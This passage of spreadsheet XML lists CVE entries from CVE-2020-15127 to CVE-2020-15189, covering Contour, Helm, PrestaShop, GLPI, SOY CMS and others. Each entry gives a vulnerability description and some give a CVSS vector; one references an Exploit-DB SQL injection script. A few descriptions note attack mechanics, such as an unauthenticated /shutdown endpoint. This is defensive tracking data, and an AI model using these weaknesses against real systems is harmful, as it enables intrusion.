    <t>In Contour ( Ingress controller for Kubernetes) before version 1.7.0, a bad actor can shut down all instances of Envoy, essentially killing the entire ingress data plane. GET requests to /shutdown on port 8090 of the Envoy pod initiate Envoy's shutdown procedure. The shutdown procedure includes flipping the readiness endpoint to false, which removes Envoy from the routing pool. When running Envoy (For example on the host network, pod spec hostNetwork=true), the shutdown manager's endpoint is accessible to anyone on the network that can reach the Kubernetes node that's running Envoy. There is no authentication in place that prevents a rogue actor on the network from shutting down Envoy via the shutdown manager endpoint. Successful exploitation of this issue will lead to bad actors shutting down all instances of Envoy, essentially killing the entire ingress data plane. This is fixed in version 1.7.0.</t>
  </si>
  <si>
    <t>CVE-2020-15128</t>
  </si>
  <si>
    <t>In OctoberCMS before version 1.0.468, encrypted cookie values were not tied to the name of the cookie the value belonged to. This meant that certain classes of attacks that took advantage of other theoretical vulnerabilities in user facing code (nothing exploitable in the core project itself) had a higher chance of succeeding. Specifically, if your usage exposed a way for users to provide unfiltered user input and have it returned to them as an encrypted cookie (ex. storing a user provided search query in a cookie) they could then use the generated cookie in place of other more tightly controlled cookies; or if your usage exposed the plaintext version of an encrypted cookie at any point to the user they could theoretically provide encrypted content from your application back to it as an encrypted cookie and force the framework to decrypt it for them. Issue has been fixed in build 468 (v1.0.468).</t>
  </si>
  <si>
    <t>CVE-2020-15129</t>
  </si>
  <si>
    <t>In Traefik before versions 1.7.26, 2.2.8, and 2.3.0-rc3, there exists a potential open redirect vulnerability in Traefik's handling of the "X-Forwarded-Prefix" header. The Traefik API dashboard component doesn't validate that the value of the header "X-Forwarded-Prefix" is a site relative path and will redirect to any header provided URI. Successful exploitation of an open redirect can be used to entice victims to disclose sensitive information. Active Exploitation of this issue is unlikely as it would require active header injection, however the Traefik team addressed this issue nonetheless to prevent abuse in e.g. cache poisoning scenarios.</t>
  </si>
  <si>
    <t>CVE-2020-1513</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows CSC Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1489.</t>
  </si>
  <si>
    <t>CVE-2020-15130</t>
  </si>
  <si>
    <t>In SLPJS (npm package slpjs) before version 0.27.4, there is a vulnerability to false-positive validation outcomes for the NFT1 Child Genesis transaction type. A poorly implemented SLP wallet or opportunistic attacker could create a seemingly valid NFT1 child token without burning any of the NFT1 Group token type as is required by the NFT1 specification. This is fixed in version 0.27.4.</t>
  </si>
  <si>
    <t>CVE-2020-15131</t>
  </si>
  <si>
    <t>In SLP Validate (npm package slp-validate) before version 1.2.2, there is a vulnerability to false-positive validation outcomes for the NFT1 Child Genesis transaction type. A poorly implemented SLP wallet or opportunistic attacker could create a seemingly valid NFT1 child token without burning any of the NFT1 Group token type as is required by the NFT1 specification. This is fixed in version 1.2.2.</t>
  </si>
  <si>
    <t>CVE-2020-15132</t>
  </si>
  <si>
    <t>In Sulu before versions 1.6.35, 2.0.10, and 2.1.1, when the "Forget password" feature on the login screen is used, Sulu asks the user for a username or email address. If the given string is not found, a response with a `400` error code is returned, along with a error message saying that this user name does not exist. This enables attackers to retrieve valid usernames. Also, the response of the "Forgot Password" request returns the email address to which the email was sent, if the operation was successful. This information should not be exposed, as it can be used to gather email addresses. This problem was fixed in versions 1.6.35, 2.0.10 and 2.1.1.</t>
  </si>
  <si>
    <t>CVE-2020-15133</t>
  </si>
  <si>
    <t>In faye-websocket before version 0.11.0, there is a lack of certification validation in TLS handshakes. The `Faye::WebSocket::Client` class uses the `EM::Connection#start_tls` method in EventMachine to implement the TLS handshake whenever a `wss:` URL is used for the connection. This method does not implement certificate verification by default, meaning that it does not check that the server presents a valid and trusted TLS certificate for the expected hostname. That means that any `wss:` connection made using this library is vulnerable to a man-in-the-middle attack, since it does not confirm the identity of the server it is connected to. For further background information on this issue, please see the referenced GitHub Advisory. Upgrading `faye-websocket` to v0.11.0 is recommended.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-15134</t>
  </si>
  <si>
    <t>Faye before version 1.4.0, there is a lack of certification validation in TLS handshakes. Faye uses em-http-request and faye-websocket in the Ruby version of its client. Those libraries both use the `EM::Connection#start_tls` method in EventMachine to implement the TLS handshake whenever a `wss:` URL is used for the connection. This method does not implement certificate verification by default, meaning that it does not check that the server presents a valid and trusted TLS certificate for the expected hostname. That means that any `https:` or `wss:` connection made using these libraries is vulnerable to a man-in-the-middle attack, since it does not confirm the identity of the server it is connected to. The first request a Faye client makes is always sent via normal HTTP, but later messages may be sent via WebSocket. Therefore it is vulnerable to the same problem that these underlying libraries are, and we needed both libraries to support TLS verification before Faye could claim to do the same. Your client would still be insecure if its initial HTTPS request was verified, but later WebSocket connections were not. This is fixed in Faye v1.4.0, which enables verification by default. For further background information on this issue, please see the referenced GitHub Advisory.</t>
  </si>
  <si>
    <t>CVE-2020-15135</t>
  </si>
  <si>
    <t>save-server (npm package) before version 1.05 is affected by a CSRF vulnerability, as there is no CSRF mitigation (Tokens etc.). The fix introduced in version version 1.05 unintentionally breaks uploading so version v1.0.7 is the fixed version. This is patched by implementing Double submit. The CSRF attack would require you to navigate to a malicious site while you have an active session with Save-Server (Session key stored in cookies). The malicious user would then be able to perform some actions, including uploading/deleting files and adding redirects. If you are logged in as root, this attack is significantly more severe. They can in addition create, delete and update users. If they updated the password of a user, that user's files would then be available. If the root password is updated, all files would be visible if they logged in with the new password. Note that due to the same origin policy malicious actors cannot view the gallery or the response of any of the methods, nor be sure they succeeded. This issue has been patched in version 1.0.7.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L</t>
  </si>
  <si>
    <t>CVE-2020-15136</t>
  </si>
  <si>
    <t>In ectd before versions 3.4.10 and 3.3.23, gateway TLS authentication is only applied to endpoints detected in DNS SRV records. When starting a gateway, TLS authentication will only be attempted on endpoints identified in DNS SRV records for a given domain, which occurs in the discoverEndpoints function. No authentication is performed against endpoints provided in the --endpoints flag. This has been fixed in versions 3.4.10 and 3.3.23 with improved documentation and deprecation of the functionality.</t>
  </si>
  <si>
    <t>CVE-2020-15137</t>
  </si>
  <si>
    <t>All versions of HoRNDIS are affected by an integer overflow in the RNDIS packet parsing routines. A malicious USB device can trigger disclosure of unrelated kernel memory to userspace applications on the host, or can cause the kernel to crash. Kernel memory disclosure is especially likely on 32-bit kernels; 64-bit kernels are more likely to crash on attempted exploitation. It is not believed that kernel memory corruption is possible, or that unattended kernel memory disclosure without the collaboration of a userspace program running on the host is possible. The vulnerability is in `HoRNDIS::receivePacket`. `msg_len`, `data_ofs`, and `data_len` can be controlled by an attached USB device, and a negative value of `data_ofs` can bypass the check for `(data_ofs + data_len + 8) &gt; msg_len`, and subsequently can cause a wild pointer copy in the `mbuf_copyback` call. The software is not maintained and no patches are planned. Users of multi-tenant systems with HoRNDIS installed should only connect trusted USB devices to their system.</t>
  </si>
  <si>
    <t>CVE-2020-15138</t>
  </si>
  <si>
    <t>Prism is vulnerable to Cross-Site Scripting. The easing preview of the Previewers plugin has an XSS vulnerability that allows attackers to execute arbitrary code in Safari and Internet Explorer. This impacts all Safari and Internet Explorer users of Prism &gt;=v1.1.0 that use the _Previewers_ plugin (&gt;=v1.10.0) or the _Previewer: Easing_ plugin (v1.1.0 to v1.9.0). This problem is fixed in version 1.21.0. To workaround the issue without upgrading, disable the easing preview on all impacted code blocks. You need Prism v1.10.0 or newer to apply this workaround.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-15139</t>
  </si>
  <si>
    <t>In MyBB before version 1.8.24, the custom MyCode (BBCode) for the visual editor doesn't escape input properly when rendering HTML, resulting in a DOM-based XSS vulnerability. The weakness can be exploited by pointing a victim to a page where the visual editor is active (e.g. as a post or Private Message) and operates on a maliciously crafted MyCode message. This may occur on pages where message content is pre-filled using a GET/POST parameter, or on reply pages where a previously saved malicious message is quoted. After upgrading MyBB to 1.8.24, make sure to update the version attribute in the `codebuttons` template for non-default themes to serve the latest version of the patched `jscripts/bbcodes_sceditor.js` file.</t>
  </si>
  <si>
    <t>CVE-2020-1514</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1198, CVE-2020-1227, CVE-2020-1345, CVE-2020-1482, CVE-2020-1575.</t>
  </si>
  <si>
    <t>CVE-2020-15140</t>
  </si>
  <si>
    <t>In Red Discord Bot before version 3.3.11, a RCE exploit has been discovered in the Trivia module: this exploit allows Discord users with specifically crafted usernames to inject code into the Trivia module's leaderboard command. By abusing this exploit, it's possible to perform destructive actions and/or access sensitive information. This critical exploit has been fixed on version 3.3.11.</t>
  </si>
  <si>
    <t>CVE-2020-15141</t>
  </si>
  <si>
    <t>In openapi-python-client before version 0.5.3, there is a path traversal vulnerability. If a user generated a client using a maliciously crafted OpenAPI document, it is possible for generated files to be placed in arbitrary locations on disk.</t>
  </si>
  <si>
    <t>CVE-2020-15142</t>
  </si>
  <si>
    <t>In openapi-python-client before version 0.5.3, clients generated with a maliciously crafted OpenAPI Document can generate arbitrary Python code. Subsequent execution of this malicious client is arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-15143</t>
  </si>
  <si>
    <t>In SyliusResourceBundle before versions 1.3.14, 1.4.7, 1.5.2 and 1.6.4, rrequest parameters injected inside an expression evaluated by `symfony/expression-language` package haven't been sanitized properly. This allows the attacker to access any public service by manipulating that request parameter, allowing for Remote Code Execution. This issue has been patched for versions 1.3.14, 1.4.7, 1.5.2 and 1.6.4. Versions prior to 1.3 were not patched.</t>
  </si>
  <si>
    <t>CVE-2020-15145</t>
  </si>
  <si>
    <t>In Composer-Setup for Windows before version 6.0.0, if the developer's computer is shared with other users, a local attacker may be able to exploit the following scenarios. 1. A local regular user may modify the existing `C:\ProgramData\ComposerSetup\bin\composer.bat` in order to get elevated command execution when composer is run by an administrator. 2. A local regular user may create a specially crafted dll in the `C:\ProgramData\ComposerSetup\bin` folder in order to get Local System privileges. See: https://itm4n.github.io/windows-server-netman-dll-hijacking. 3. If the directory of the php.exe selected by the user is not in the system path, it is added without checking that it is admin secured, as per Microsoft guidelines. See: https://msrc-blog.microsoft.com/2018/04/04/triaging-a-dll-planting-vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-15146</t>
  </si>
  <si>
    <t>In SyliusResourceBundle before versions 1.3.14, 1.4.7, 1.5.2 and 1.6.4, request parameters injected inside an expression evaluated by `symfony/expression-language` package haven't been sanitized properly. This allows the attacker to access any public service by manipulating that request parameter, allowing for Remote Code Execution. This issue has been patched for versions 1.3.14, 1.4.7, 1.5.2 and 1.6.4. Versions prior to 1.3 were not patched.</t>
  </si>
  <si>
    <t>CVE-2020-15147</t>
  </si>
  <si>
    <t>Red Discord Bot before versions 3.3.12 and 3.4 has a Remote Code Execution vulnerability in the Streams module. This exploit allows Discord users with specifically crafted "going live" messages to inject code into the Streams module's going live message. By abusing this exploit, it's possible to perform destructive actions and/or access sensitive information. As a workaround, unloading the Trivia module with `unload streams` can render this exploit not accessible. It is highly recommended updating to 3.3.12 or 3.4 to completely patch this issue.</t>
  </si>
  <si>
    <t>CVE-2020-15148</t>
  </si>
  <si>
    <t>Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. This is fixed in version 2.0.38. A possible workaround without upgrading is available in the linked advisory.</t>
  </si>
  <si>
    <t>CVE-2020-15149</t>
  </si>
  <si>
    <t>NodeBB before version 1.14.3 has a bug introduced in version 1.12.2 in the validation logic that makes it possible to change the password of any user on a running NodeBB forum by sending a specially crafted socket.io call to the server. This could lead to a privilege escalation event due via an account takeover. As a workaround you may cherry-pick the following commit from the project's repository to your running instance of NodeBB: 16cee1b03ba3eee177834a1fdac4aa8a12b39d2a. This is fixed in version 1.14.3.</t>
  </si>
  <si>
    <t>CVE-2020-1515</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Telephony Server Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15150</t>
  </si>
  <si>
    <t>There is a vulnerability in Paginator (Elixir/Hex package) which makes it susceptible to Remote Code Execution (RCE) attacks via input parameters to the paginate() function. This will potentially affect all current users of Paginator prior to version 1.0.0. The vulnerability has been patched in version 1.0.0 and all users should upgrade to this version immediately. Note that this patched version uses a dependency that requires an Elixir version &gt;=1.5.</t>
  </si>
  <si>
    <t>CVE-2020-15151</t>
  </si>
  <si>
    <t>OpenMage LTS before versions 19.4.6 and 20.0.2 allows attackers to circumvent the `fromkey protection` in the Admin Interface and increases the attack surface for Cross Site Request Forgery attacks. This issue is related to Adobe's CVE-2020-9690. It is patched in versions 19.4.6 and 20.0.2.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-15152</t>
  </si>
  <si>
    <t>ftp-srv is an npm package which is a modern and extensible FTP server designed to be simple yet configurable. In ftp-srv before versions 2.19.6, 3.1.2, and 4.3.4 are vulnerable to Server-Side Request Forgery. The PORT command allows arbitrary IPs which can be used to cause the server to make a connection elsewhere. A possible workaround is blocking the PORT through the configuration. This issue is fixed in version2 2.19.6, 3.1.2, and 4.3.4. More information can be found on the linked advisory.</t>
  </si>
  <si>
    <t>CVE-2020-15153</t>
  </si>
  <si>
    <t>Ampache before version 4.2.2 allows unauthenticated users to perform SQL injection. Refer to the referenced GitHub Security Advisory for details and a workaround. This is fixed in version 4.2.2 and the development branch.</t>
  </si>
  <si>
    <t>CVE-2020-15154</t>
  </si>
  <si>
    <t>baserCMS 4.3.6 and earlier is affected by Cross Site Scripting (XSS) via arbitrary script execution. Admin access is required to exploit this vulnerability. The affected components are: content_fields.php, content_info.php, content_options.php, content_related.php, index_list_tree.php, jquery.bcTree.js. The issue is fixed in version 4.3.7.</t>
  </si>
  <si>
    <t>CVE-2020-15155</t>
  </si>
  <si>
    <t>baserCMS 4.3.6 and earlier is affected by Cross Site Scripting (XSS) via arbitrary script execution. Admin access is required to exploit this vulnerability. The affected components is toolbar.php. The issue is fixed in version 4.3.7.</t>
  </si>
  <si>
    <t>CVE-2020-15156</t>
  </si>
  <si>
    <t>In nodebb-plugin-blog-comments before version 0.7.0, a logged in user is vulnerable to an XSS attack which could allow a third party to post on their behalf on the forum. This is due to lack of CSRF validation.</t>
  </si>
  <si>
    <t>CVE-2020-15157</t>
  </si>
  <si>
    <t>In containerd (an industry-standard container runtime) before version 1.2.14 there is a credential leaking vulnerability. If a container image manifest in the OCI Image format or Docker Image V2 Schema 2 format includes a URL for the location of a specific image layer (otherwise known as a “foreign layer”), the default containerd resolver will follow that URL to attempt to download it. In v1.2.x but not 1.3.0 or later, the default containerd resolver will provide its authentication credentials if the server where the URL is located presents an HTTP 401 status code along with registry-specific HTTP headers. If an attacker publishes a public image with a manifest that directs one of the layers to be fetched from a web server they control and they trick a user or system into pulling the image, they can obtain the credentials used for pulling that image. In some cases, this may be the user's username and password for the registry. In other cases, this may be the credentials attached to the cloud virtual instance which can grant access to other cloud resources in the account. The default containerd resolver is used by the cri-containerd plugin (which can be used by Kubernetes), the ctr development tool, and other client programs that have explicitly linked against it. This vulnerability has been fixed in containerd 1.2.14. containerd 1.3 and later are not affected. If you are using containerd 1.3 or later, you are not affected. If you are using cri-containerd in the 1.2 series or prior, you should ensure you only pull images from trusted sources. Other container runtimes built on top of containerd but not using the default resolver (such as Docker) are not affected.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N</t>
  </si>
  <si>
    <t>CVE-2020-15158</t>
  </si>
  <si>
    <t>In libIEC61850 before version 1.4.3, when a message with COTP message length field with value &lt; 4 is received an integer underflow will happen leading to heap buffer overflow. This can cause an application crash or on some platforms even the execution of remote code. If your application is used in open networks or there are untrusted nodes in the network it is highly recommend to apply the patch. This was patched with commit 033ab5b. Users of version 1.4.x should upgrade to version 1.4.3 when available. As a workaround changes of commit 033ab5b can be applied to older versions.</t>
  </si>
  <si>
    <t>CVE-2020-15159</t>
  </si>
  <si>
    <t>baserCMS 4.3.6 and earlier is affected by Cross Site Scripting (XSS) and Remote Code Execution (RCE). This may be executed by logging in as a system administrator and uploading an executable script file such as a PHP file.The affected components are ThemeFilesController.php and UploaderFilesController.php. This is fixed in version 4.3.7.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2020-1516</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Work Folders Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1470, CVE-2020-1484.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49755.py</t>
  </si>
  <si>
    <t>PrestaShop 1.7.6.7 - 'location' Blind Sql Injection</t>
  </si>
  <si>
    <t>2021-04-09</t>
  </si>
  <si>
    <t>CVE-2020-15160</t>
  </si>
  <si>
    <t>PrestaShop from version 1.7.5.0 and before version 1.7.6.8 is vulnerable to a blind SQL Injection attack in the Catalog Product edition page with location parameter. The problem is fixed in 1.7.6.8</t>
  </si>
  <si>
    <t>CVE-2020-15161</t>
  </si>
  <si>
    <t>In PrestaShop from version 1.6.0.4 and before version 1.7.6.8 an attacker is able to inject javascript while using the contact form. The problem is fixed in 1.7.6.8</t>
  </si>
  <si>
    <t>CVE-2020-15162</t>
  </si>
  <si>
    <t>In PrestaShop from version 1.5.0.0 and before version 1.7.6.8, users are allowed to send compromised files. These attachments allowed people to input malicious JavaScript which triggered an XSS payload. The problem is fixed in version 1.7.6.8.</t>
  </si>
  <si>
    <t>CVE-2020-15163</t>
  </si>
  <si>
    <t>Python TUF (The Update Framework) reference implementation before version 0.12 it will incorrectly trust a previously downloaded root metadata file which failed verification at download time. This allows an attacker who is able to serve multiple new versions of root metadata (i.e. by a person-in-the-middle attack) culminating in a version which has not been correctly signed to control the trust chain for future updates. This is fixed in version 0.12 and newer.</t>
  </si>
  <si>
    <t>CVE-2020-15164</t>
  </si>
  <si>
    <t>in Scratch Login (MediaWiki extension) before version 1.1, any account can be logged into by using the same username with leading, trailing, or repeated underscore(s), since those are treated as whitespace and trimmed by MediaWiki. This affects all users on any wiki using this extension. Since version 1.1, comments by users whose usernames would be trimmed on MediaWiki are ignored when searching for the verification code.</t>
  </si>
  <si>
    <t>CVE-2020-15165</t>
  </si>
  <si>
    <t>Version 1.1.6-free of Chameleon Mini Live Debugger on Google Play Store may have had it's sources or permissions tampered by a malicious actor. The official maintainer of the package is recommending all users upgrade to v1.1.8 as soon as possible. For more information, review the referenced GitHub Security Advisory.</t>
  </si>
  <si>
    <t>506</t>
  </si>
  <si>
    <t>CVE-2020-15166</t>
  </si>
  <si>
    <t>In ZeroMQ before version 4.3.3, there is a denial-of-service vulnerability. Users with TCP transport public endpoints, even with CURVE/ZAP enabled, are impacted. If a raw TCP socket is opened and connected to an endpoint that is fully configured with CURVE/ZAP, legitimate clients will not be able to exchange any message. Handshakes complete successfully, and messages are delivered to the library, but the server application never receives them. This is patched in version 4.3.3.</t>
  </si>
  <si>
    <t>CVE-2020-15167</t>
  </si>
  <si>
    <t>In Miller (command line utility) using the configuration file support introduced in version 5.9.0, it is possible for an attacker to cause Miller to run arbitrary code by placing a malicious `.mlrrc` file in the working directory. See linked GitHub Security Advisory for complete details. A fix is ready and will be released as Miller 5.9.1.</t>
  </si>
  <si>
    <t>CVE-2020-15168</t>
  </si>
  <si>
    <t>node-fetch before versions 2.6.1 and 3.0.0-beta.9 did not honor the size option after following a redirect, which means that when a content size was over the limit, a FetchError would never get thrown and the process would end without failure. For most people, this fix will have a little or no impact. However, if you are relying on node-fetch to gate files above a size, the impact could be significant, for example: If you don't double-check the size of the data after fetch() has completed, your JS thread could get tied up doing work on a large file (DoS) and/or cost you money in computing.</t>
  </si>
  <si>
    <t>CVE-2020-15169</t>
  </si>
  <si>
    <t>In Action View before versions 5.2.4.4 and 6.0.3.3 there is a potential Cross-Site Scripting (XSS) vulnerability in Action View's translation helpers. Views that allow the user to control the default (not found) value of the `t` and `translate` helpers could be susceptible to XSS attacks. When an HTML-unsafe string is passed as the default for a missing translation key named html or ending in _html, the default string is incorrectly marked as HTML-safe and not escaped. This is patched in versions 6.0.3.3 and 5.2.4.4. A workaround without upgrading is proposed in the source advisory.</t>
  </si>
  <si>
    <t>CVE-2020-1517</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows File Server Resource Management Service improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows File Server Resource Management Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1518.</t>
  </si>
  <si>
    <t>CVE-2020-15170</t>
  </si>
  <si>
    <t>apollo-adminservice before version 1.7.1 does not implement access controls. If users expose apollo-adminservice to internet(which is not recommended), there are potential security issues since apollo-adminservice is designed to work in intranet and it doesn't have access control built-in. Malicious hackers may access apollo-adminservice apis directly to access/edit the application's configurations. To fix the potential issue without upgrading, simply follow the advice that do not expose apollo-adminservice to internet.</t>
  </si>
  <si>
    <t>CVE-2020-15171</t>
  </si>
  <si>
    <t>In XWiki before versions 11.10.5 or 12.2.1, any user with SCRIPT right (EDIT right before XWiki 7.4) can gain access to the application server Servlet context which contains tools allowing to instantiate arbitrary Java objects and invoke methods that may lead to arbitrary code execution. The only workaround is to give SCRIPT right only to trusted users.</t>
  </si>
  <si>
    <t>CVE-2020-15172</t>
  </si>
  <si>
    <t>The Act module for Red Discord Bot before commit 6b9f3b86 is vulnerable to Remote Code Execution. With this exploit, Discord users can use specially crafted messages to perform destructive actions and/or access sensitive information. Unloading the Act module with `unload act` can render this exploit inaccessible.</t>
  </si>
  <si>
    <t>CVE-2020-15173</t>
  </si>
  <si>
    <t>In ACCEL-PPP (an implementation of PPTP/PPPoE/L2TP/SSTP), there is a buffer overflow when receiving an l2tp control packet ith an AVP which type is a string and no hidden flags, length set to less than 6. If your application is used in open networks or there are untrusted nodes in the network it is highly recommended to apply the patch. The problem was patched with commit 2324bcd5ba12cf28f47357a8f03cd41b7c04c52b As a workaround changes of commit 2324bcd5ba12cf28f47357a8f03cd41b7c04c52b can be applied to older versions.</t>
  </si>
  <si>
    <t>CVE-2020-15174</t>
  </si>
  <si>
    <t>In Electron before versions 11.0.0-beta.1, 10.0.1, 9.3.0 or 8.5.1 the `will-navigate` event that apps use to prevent navigations to unexpected destinations as per our security recommendations can be bypassed when a sub-frame performs a top-frame navigation across sites. The issue is patched in versions 11.0.0-beta.1, 10.0.1, 9.3.0 or 8.5.1 As a workaround sandbox all your iframes using the sandbox attribute. This will prevent them creating top-frame navigations and is good practice anyway.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:L</t>
  </si>
  <si>
    <t>CVE-2020-15175</t>
  </si>
  <si>
    <t>In GLPI before version 9.5.2, the `?pluginimage.send.php?` endpoint allows a user to specify an image from a plugin. The parameters can be maliciously crafted to instead delete the .htaccess file for the files directory. Any user becomes able to read all the files and folders contained in “/files/”. Some of the sensitive information that is compromised are the user sessions, logs, and more. An attacker would be able to get the Administrators session token and use that to authenticate. The issue is patched in version 9.5.2.</t>
  </si>
  <si>
    <t>CVE-2020-15176</t>
  </si>
  <si>
    <t>In GLPI before version 9.5.2, when supplying a back tick in input that gets put into a SQL query,the application does not escape or sanitize allowing for SQL Injection to occur. Leveraging this vulnerability an attacker is able to exfiltrate sensitive information like passwords, reset tokens, personal details, and more. The issue is patched in version 9.5.2</t>
  </si>
  <si>
    <t>CVE-2020-15177</t>
  </si>
  <si>
    <t>In GLPI before version 9.5.2, the `install/install.php` endpoint insecurely stores user input into the database as `url_base` and `url_base_api`. These settings are referenced throughout the application and allow for vulnerabilities like Cross-Site Scripting and Insecure Redirection Since authentication is not required to perform these changes,anyone could point these fields at malicious websites or form input in a way to trigger XSS. Leveraging JavaScript it's possible to steal cookies, perform actions as the user, etc. The issue is patched in version 9.5.2.</t>
  </si>
  <si>
    <t>CVE-2020-15178</t>
  </si>
  <si>
    <t>In PrestaShop contactform module (prestashop/contactform) before version 4.3.0, an attacker is able to inject JavaScript while using the contact form. The `message` field was incorrectly unescaped, possibly allowing attackers to execute arbitrary JavaScript in a victim's browser.</t>
  </si>
  <si>
    <t>CVE-2020-15179</t>
  </si>
  <si>
    <t>The ScratchSig extension for MediaWiki before version 1.0.1 allows stored Cross-Site Scripting. Using &lt;script&gt; tag inside &lt;scratchsig&gt; tag, attackers with edit permission can execute scripts on visitors' browser. With MediaWiki JavaScript API, this can potentially lead to privilege escalation and/or account takeover. This has been patched in release 1.0.1. This has already been deployed to all Scratch Wikis. No workarounds exist other than disabling the extension completely.</t>
  </si>
  <si>
    <t>CVE-2020-1518</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows File Server Resource Management Service improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows File Server Resource Management Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1517.</t>
  </si>
  <si>
    <t>CVE-2020-15180</t>
  </si>
  <si>
    <t>A flaw was found in the mysql-wsrep component of mariadb. Lack of input sanitization in `wsrep_sst_method` allows for command injection that can be exploited by a remote attacker to execute arbitrary commands on galera cluster nodes. This threatens the system's confidentiality, integrity, and availability. This flaw affects mariadb versions before 10.1.47, before 10.2.34, before 10.3.25, before 10.4.15 and before 10.5.6.</t>
  </si>
  <si>
    <t>CVE-2020-15181</t>
  </si>
  <si>
    <t>The Alfresco Reset Password add-on before version 1.2.0 relies on untrusted inputs in a security decision. Intruders can get admin's access to the system using the vulnerability in the project. Impacts all servers where this add-on is installed. The problem is fixed in version 1.2.0</t>
  </si>
  <si>
    <t>CVE-2020-15182</t>
  </si>
  <si>
    <t>The SOY Inquiry component of SOY CMS is affected by Cross-site Request Forgery (CSRF) and Remote Code Execution (RCE). The vulnerability affects versions 2.0.0.3 and earlier of SOY Inquiry. This allows remote attackers to force the administrator to edit files once the administrator loads a specially crafted webpage. An administrator must be logged in for exploitation to be possible. This issue is fixed in SOY Inquiry version 2.0.0.4 and included in SOY CMS 3.0.2.328.</t>
  </si>
  <si>
    <t>CVE-2020-15183</t>
  </si>
  <si>
    <t>SoyCMS 3.0.2 and earlier is affected by Reflected Cross-Site Scripting (XSS) which leads to Remote Code Execution (RCE) from a known vulnerability. This allows remote attackers to force the administrator to edit files once the adminsitrator loads a specially crafted webpage.</t>
  </si>
  <si>
    <t>CVE-2020-15184</t>
  </si>
  <si>
    <t>In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the `alias` field on a `Chart.yaml` is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the `dependencies` field of any untrusted chart, verifying that the `alias` field is either not used, or (if used) does not contain newlines or path characters.</t>
  </si>
  <si>
    <t>CVE-2020-15185</t>
  </si>
  <si>
    <t>In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL connection). This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the index file in the Helm repository cache before installing software.</t>
  </si>
  <si>
    <t>CVE-2020-15186</t>
  </si>
  <si>
    <t>In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to `helm --help`. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the `name` field in the `plugin.yaml` file for a plugin, looking for characters outside of the [a-zA-Z0-9._-] range.</t>
  </si>
  <si>
    <t>CVE-2020-15187</t>
  </si>
  <si>
    <t>In Helm before versions 2.16.11 and 3.3.2, a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded (which can occur during a MITM attack on a non-SSL connection). This issue has been patched in Helm 2.16.11 and Helm 3.3.2. As a possible workaround make sure to install plugins using a secure connection protocol like SSL.</t>
  </si>
  <si>
    <t>CVE-2020-15188</t>
  </si>
  <si>
    <t>SOY CMS 3.0.2.327 and earlier is affected by Unauthenticated Remote Code Execution (RCE). The allows remote attackers to execute any arbitrary code when the inquiry form feature is enabled by the service. The vulnerability is caused by unserializing the form without any restrictions. This was fixed in 3.0.2.328.</t>
  </si>
  <si>
    <t>CVE-2020-15189</t>
  </si>
  <si>
    <t>SOY CMS 3.0.2 and earlier is affected by Remote Code Execution (RCE) using Unrestricted File Upload. Cross-Site Scripting(XSS) vulnerability that was used in CVE-2020-15183 can be used to increase impact by redirecting the administrator to access a specially crafted page. This vulnerability is caused by insecure configuration in elFinder. This is fixed in version 3.0.2.328.</t>
  </si>
  <si>
